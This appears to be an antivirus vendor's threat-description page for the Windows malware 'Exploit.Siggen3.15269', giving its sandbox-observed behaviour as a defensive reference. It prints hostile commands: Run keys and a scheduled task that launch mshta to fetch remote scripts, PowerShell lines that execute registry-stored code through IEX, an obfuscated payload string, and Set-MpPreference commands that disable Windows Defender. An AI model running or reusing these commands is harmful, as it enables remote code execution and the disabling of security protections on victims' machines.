Exploit.Siggen3.15269

Technical Information

To ensure autorun and distribution

Modifies the following registry keys

[<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'phulihoja' = 'mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell ((gp HKCU:\Software).cutona)|IEX"", 0 : window.clo...
[<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'dkkkksakdosexography' = 'mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""mshta http://1230948%1230948@bublicamukajuka.blogs...
[<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] '' = 'mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""mshta http://1230948%1230948@titupatiyannala-myrynaal.blogspot.com/p/3...
[<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'nunukhaoo' = 'mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""mshta http://1230948%1230948@papagunnakjllidmc.blogspot.com/p...
[<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'phulihoja' = 'mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell ((gp HKCU:\Software).btfee)|IEX"", 0 : window.clos...

Creates or modifies the following files

<SYSTEM32>\tasks\tutipajikhana

Malicious functions

To complicate detection of its presence in the operating system,

blocks execution of the following system utilities:

Windows Defender

Executes the following

'<SYSTEM32>\taskkill.exe' /f /im winword.exe
'<SYSTEM32>\taskkill.exe' /f /im Excel.exe

Executes the following (exploit)

'<SYSTEM32>\mshta.exe' HTTp://j.#p/aswwdwoxwowwoxknawij
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-MpPreference -DisableBehaviorMonitoring $true
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-MpPreference -DisableRealtimeMonitoring $true
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -c $ijijinjnini='**$**46**$**56**$**c6**$**26**$**16**$**37**$**96**$**44**$**02**$**56**$**07**$**97**$**45**$**07**$**57**$**47**$**27**$**16**$**47**$**35**$**d2**$**02**$**46**$**e6**$**56*...
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-MpPreference -SevereThreatDefaultAction 6
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-MpPreference -LowThreatDefaultAction 6
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-MpPreference -ModerateThreatDefaultAction 6
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-MpPreference -HighThreatDefaultAction 6 -Force
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-MpPreference -MAPSReporting 0
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-MpPreference -SubmitSamplesConsent 2
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-MpPreference -DisableScriptScanning $true
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-MpPreference -DisableIOAVProtection $true
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-MpPreference -DisableBlockAtFirstSeen $true

Injects code into

the following system processes:

%WINDIR%\microsoft.net\framework\v4.0.30319\jsc.exe

Modifies file system

Creates the following files

C:\users\public\siggiaw.vbs
C:\users\public\1.txt
C:\users\public\bin.vbs

Deletes the following files

C:\users\public\siggiaw.vbs

Network activity

Connects to

'j.#p':80
'tu#########achodamarunmain.blogspot.com':443
'bl##ger.com':443
're#####es.blogblog.com':443
'fo###.#oogleapis.com':443
'go#####analytics.com':443
'ia#####8.us.archive.org':443
'ia#####0.us.archive.org':443
'oc##.thawte.com':80

TCP

'tu#########achodamarunmain.blogspot.com':443
'bl##ger.com':443
're#####es.blogblog.com':443
'fo###.#oogleapis.com':443
'go#####analytics.com':443
'ia#####8.us.archive.org':443
'ia#####0.us.archive.org':443

UDP

DNS ASK j.#p
DNS ASK tu#########achodamarunmain.blogspot.com
DNS ASK bl##ger.com
DNS ASK re#####es.blogblog.com
DNS ASK fo###.#oogleapis.com
DNS ASK go#####analytics.com
DNS ASK ia#####8.us.archive.org
DNS ASK ia#####0.us.archive.org
DNS ASK oc##.thawte.com

Miscellaneous

Searches for the following windows

ClassName: 'MS_AutodialMonitor' WindowName: ''
ClassName: 'MS_WebCheckMonitor' WindowName: ''
ClassName: '' WindowName: ''

Creates and executes the following

'<SYSTEM32>\wscript.exe' "C:\Users\Public\SiggiaW.vbs"
'<SYSTEM32>\wscript.exe' "C:\Users\Public\bin.vbs"
'<SYSTEM32>\wscript.exe' "C:\Users\Public\bin.vbs" /elevate
'<SYSTEM32>\cmd.exe' /c cd C:\Users\Public &@echo dim http_obj >>SiggiaW.vbs &@echo dim stream_obj >>SiggiaW.vbs &@echo dim shell_obj >>SiggiaW.vbs &@echo set http_obj = CreateObject("Microsoft.XMLHTTP") >>SiggiaW....' (with hidden window)
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-MpPreference -DisableScriptScanning $true' (with hidden window)
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-MpPreference -SubmitSamplesConsent 2' (with hidden window)
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-MpPreference -MAPSReporting 0' (with hidden window)
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-MpPreference -HighThreatDefaultAction 6 -Force' (with hidden window)
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-MpPreference -ModerateThreatDefaultAction 6' (with hidden window)
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-MpPreference -LowThreatDefaultAction 6' (with hidden window)
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-MpPreference -SevereThreatDefaultAction 6' (with hidden window)
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-MpPreference -DisableRealtimeMonitoring $true' (with hidden window)
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-MpPreference -DisableIOAVProtection $true' (with hidden window)
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-MpPreference -DisableBehaviorMonitoring $true' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit ((gp HKCU:\Software).cutona)|IEX' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit ((gp HKCU:\Software).btfee)|IEX' (with hidden window)
'<SYSTEM32>\taskkill.exe' /f /im Excel.exe' (with hidden window)
'<SYSTEM32>\taskkill.exe' /f /im winword.exe' (with hidden window)
'<SYSTEM32>\schtasks.exe' /create /sc MINUTE /mo 80 /tn ""tutipajikhana"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://12#############@mylundisfarbigthenyouthink.bl...' (with hidden window)
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -c $ijijinjnini='**$**46**$**56**$**c6**$**26**$**16**$**37**$**96**$**44**$**02**$**56**$**07**$**97**$**45**$**07**$**57**$**47**$**27**$**16**$**47**$**35**$**d2**$**02**$**46**$**e6**$**56*...' (with hidden window)
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-MpPreference -DisableBlockAtFirstSeen $true' (with hidden window)

Executes the following

'<SYSTEM32>\cmd.exe' /c cd C:\Users\Public &@echo dim http_obj >>SiggiaW.vbs &@echo dim stream_obj >>SiggiaW.vbs &@echo dim shell_obj >>SiggiaW.vbs &@echo set http_obj = CreateObject("Microsoft.XMLHTTP") >>SiggiaW....
'<SYSTEM32>\schtasks.exe' /create /sc MINUTE /mo 80 /tn ""tutipajikhana"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://12#############@mylundisfarbigthenyouthink.bl...
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit ((gp HKCU:\Software).btfee)|IEX
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit ((gp HKCU:\Software).cutona)|IEX
'%WINDIR%\microsoft.net\framework\v4.0.30319\jsc.exe'

TECHNOLOGIES

TERMINOLOGIE

COURS ET EDU

MYTHES

Technical Information

Recommandations pour le traitement

Free trial